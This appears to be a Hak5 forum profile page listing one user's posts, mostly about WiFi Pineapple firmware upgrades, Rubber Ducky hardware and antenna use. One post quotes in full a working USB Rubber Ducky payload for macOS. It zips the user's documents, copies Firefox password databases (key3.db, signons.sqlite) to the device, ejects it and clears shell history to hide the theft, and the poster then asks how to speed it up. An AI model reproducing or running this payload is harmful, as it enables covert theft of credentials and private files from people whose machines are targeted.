Jump to content

brazen

Active Members
  • Posts

    58
  • Joined

  • Last visited

Everything posted by brazen

  1. i found the website Thanks mreidiv! http://www.shodanhq.com/ now I just need to find the interview! THANK YOU! (and yes! I did shout that) ;)
  2. Thanks Cooper! As awesome as this is, it's not the one that I am looking for. I have searched the hak5 channel, I am just not sure how to search exactly what it is that I am looking for.
  3. I am really looking for the interview. There was a lot of great information in there that I am wanting to hear again! I wish I could find it. I think the website had a 0 (zero) in the name or url. I also looked on vimeo.
  4. I have searched the channel. I have been looking for this video for a few months now (on and off). I remember Darren was at a conference and interviewed someone by the door. I checked youtube, but maybe it was someplace else. don't remember :/ edit - I remember the guy was talking in the interview to Darren about how he nmapped the internet, he came across a dam in Europe that was exposed. He attempted to contact them to let them know about the lack of security, and they kind of blew him off. There is a website he had put together where one could search.
  5. Here is something i came across when installing on my mbp. https://forums.kali.org/showthread.php?20158-fresh-install-of-old-kali-1-0-download&p=30910&viewfull=1#post30910
  6. I remember watching an interview Darren did with someone who nmapped the Internet. Does anyone have a link? There is an entire website he created about this, and i cant remember now.
  7. Sorry... Got busy and just pushed post. I have done that, even re opening browser, ./wp5.sh again, and go to mk5 in ice weasel. And it then fails to load Ill do this all again tomorrow from office and document correctly instead of from memory.
  8. Seb, I agree. I dont want to do dip switch either, however, when i login to mk5 on the 1.2.0 firmware, and go to upgrade to 1.3.0, it downloads the file and acts as though it is upgrading firmware. I did this several times. The last time i did it this way, i left it going overnight until i got back the next morning. Figuring that it was done, i did a reboot on mk5. Ill try again and report back maƱana.
  9. i'll go and search 1.3.0 threads about that issue... thanks edit ~ where are the posts look at the other threads on 1.3.0 upgrade issues where are the 1.3.0 upgrade issue threads? i don't see them
  10. i'm not doing this on apple, i'm doing this on kali I am doing this by setting dip switches up, up, up, up, down; going to 192.168.1.1; uploading file I downloaded firmware 1.3.0 from https://wifipineapple.com/?downloads ; the 1.3.0 file will not go. i get an error every time. but the 1.2.0 file works perfect every time.
  11. lemme know if I should start a new thread or not... I downloaded firmware 1.3.0 from https://wifipineapple.com/?downloads i went to install it and it was unsuccessful [upgrade failed.] HOWEVER, i went to reflash it with the 1.2.0 and it was successful. but i would like to do the 1.3.0 upgrade... any ideas as to why I can't get the 1.3.0 to flash?
  12. fyi ~ https://wifipineapple.com/?flashing is still only referencing 1.2.0
  13. it's working on kali machine. i am wondering if this particular iMac is having some type of 'issue' as even when every other device connects to AP kali, this specific device will not browse internet when connected to kali AP, however all the other iMacs, iPads, iPhones, etc... all connect. i must have done something to this one that it doesn't do anything in relation to mk5. weird
  14. ok Merlin, in the link you provided, look at the screenshots. It shows ./wp5.sh being ran successfully. Seb, ill run it in kali...
  15. my computer is connected to pineapple via Ethernet. My computer is connected to Internet via wifi, so my ip is 192.168.x.x I am running the script on a Mac OS X terminal, not using sudo. I downloaded wget http://wifipineapple.com/mk5/wp5.sh chmod +x wp5.sh sudo bash wp5.sh Edit ... not using sudo... Doing ./wp5.sh
  16. it's not getting that far in the process... it's just stopping after interface between PC and Internet [wlan0]:
  17. here are my settings with wp5.sh Pineapple Netmask [255.255.255.0]: Pineapple Network [172.16.42.0/24]: Interface between PC and Pineapple [eth0]: Interface between PC and Internet [wlan0]: and then nothing... i am able to connect to mk5 and login... when i do and I go to the Network tile and click on Internet IP: show... it shows Error Connecting I have mk5 ethernet connected to computer and computer connected to wifi (not pineapple) I am attempting to update to 1.3 firmware. please advise. brazen
  18. how is this ducky related? the otg adapter is what came with the ducky. I don't know if there is something wrong with: 1. the otg 2. my phone. 3. apple usb keyboard not compatible with phone? not sure. I purchased this here from hak5 so I thought I would ask at hak5 forums
  19. did upgrade to 1.1.0 connected via ethernet i created new password after an hour, i booted in and restarted the mk5 i log in and i see a black screen with no options except to logout
  20. I purchased the Exfiltrator ducky. I connected a usb keyboard (that shipped with my iMac) to my android phone with the OTG adapter that came with the ducky. I am not able to type with the keyboard. I even opened a terminal on the phone from an app icon and tried to type with the keyboard without success. I am ofcourse able to type on the android with my fingers, but not able to type from the keyboard. HTC Sensation - did a check for updates and my "phone is up to date" Android version 4.0.3 HTC Sense version 3.6 http://hakshop.myshopify.com/collections/usb-rubber-ducky/products/usb-rubber-ducky-exfiltrator
  21. you may not believe me, BUT... i was having issues with connecting to AP's. So I took of the antennas and switched them... all of a sudden... it's working perfectly!
  22. I am running this as we speak: https://forums.hak5.org/index.php?/topic/28626-payload-osx-thread-first-reverse-shell-payload/?p=218073 REM title: OSX harvest firefox password files / assorted doccuments --> copy to folder on drive named after user name --> cover tracks DELAY 2000 GUI SPACE DELAY 300 STRING terminal ENTER DELAY 1000 STRING until ls -l /Volumes/DUCKY | grep -q ".*";do find ~/Documents -type f \( -name '*.doc' -o -name '*.docx' -o -name '*.pdf' -o -name '*.odt' \) | sed 's/./\\&/g' | xargs -n1 zip docs_$(whoami)_$(date +"%m-%d-%y"); echo "WAITING FOR DRIVE...";done; echo "MOUNTED... COPYING..."; cp docs_$(whoami)_$(date +"%m-%d-%y").zip /Volumes/DUCKY/; mkdir /Volumes/DUCKY/$(whoami); cd ~/Library/Application\ Support/; cp "$(find . -iname "key3.db")" "$(find . -iname "signons.sqlite")" /Volumes/DUCKY/$(whoami)/; diskutil eject DUCKY; rm docs_$(whoami)_$(date +"%m-%d-%y").zip; history -c; clear; exit; ENTER GUI m is there a way to limit this to grab as many files as possible in say 60 seconds? I am testing this out and my one computer has LOTS of files and it's taking a very long time.
  23. Same issue here on iMacs using safari and iPad using safari.
  24. I shutdown by sshing (if thats an actual verb lol) into it and typing shutdown, wait 60 seconds and pull the power cable out. Not sure about ur card, i leave the to more knowledgable minds...
  25. first things first... HOLY CRAP! and why do I have a metal taste in my mouth? i just got the sma/rp-sma connector. I hooked up the 18dbi yagi to mk5 while monitoring nearby networks, just to see how much difference there is. I did this by holding the yagi in my hand and pointing it in different directions. after about 5 minutes, I have the metallic taste in my mouth. (note ~ the last time i had this metallic taste in my mouth, i ordered a bunch of very powerful, very small magnets and create a ring around my finger so I could make pens moves, etc... that lasted for about an hour until i almost vomitted... i guess the magnets were messing with the iron in my blood and I had a blood tasting burps with a metalic taste in my mouth... or like when taking very strong antibiotics) anyways... I put the yagi away for now until i figure out the best way to mount it. the available AP went from 10 to 16 and this was not done in a residential area.
×
×
  • Create New...